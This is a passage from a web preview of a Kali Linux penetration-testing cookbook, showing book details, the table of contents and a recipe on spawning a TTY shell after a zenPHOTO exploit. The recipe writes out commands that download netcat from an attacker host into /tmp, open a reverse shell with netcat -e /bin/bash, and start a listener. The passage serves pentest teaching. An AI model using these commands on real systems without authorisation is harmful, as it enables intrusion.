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Kali Linux - An Ethical Hacker's Cookbook

You're reading from   Kali Linux - An Ethical Hacker's Cookbook End-to-end penetration testing solutions

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Product type Paperback
Published in Oct 2017
Publisher Packt
ISBN-13 9781787121829
Length 376 pages
Edition 1st Edition
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Himanshu Sharma Himanshu Sharma
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Table of Contents (13) Chapters Close

Preface 1. Kali – An Introduction FREE CHAPTER 2. Gathering Intel and Planning Attack Strategies 3. Vulnerability Assessment 4. Web App Exploitation – Beyond OWASP Top 10 5. Network Exploitation on Current Exploitation 6. Wireless Attacks – Getting Past Aircrack-ng 7. Password Attacks – The Fault in Their Stars 8. Have Shell Now What? 9. Buffer Overflows 10. Playing with Software-Defined Radios 11. Kali in Your Pocket – NetHunters and Raspberries 12. Writing Reports

Spawning a TTY Shell


We have covered different types of privilege escalation. Now let's look at some examples on how to get a TTY shell on this system. A TTY showcases a simple text output environment, that allows us to type commands and get the output.

How to do it...

  1. Let's look at the following example, where we have a web application running zenPHOTO:
  1. The zenPHOTO already has a public exploit running, which we get access to via a limited shell:
  1. Since this is a limited shell, we try to escape it and get a reverse connection by first uploading netcat on the system and then using netcat to gain a backconnect:
      wget x.x.x.x/netcat –o /tmp/netcat
  1. Now we can backconnect using the following command:
      netcat <our IP > -e /bin/bash <port number>
  1. Looking at our Terminal window, where we had our listener setup, we will see a successful connection:
      nc –lnvp <port number>

Let's get a more stable TTY shell; assuming it's a Linux system, we already have Python installed on it...

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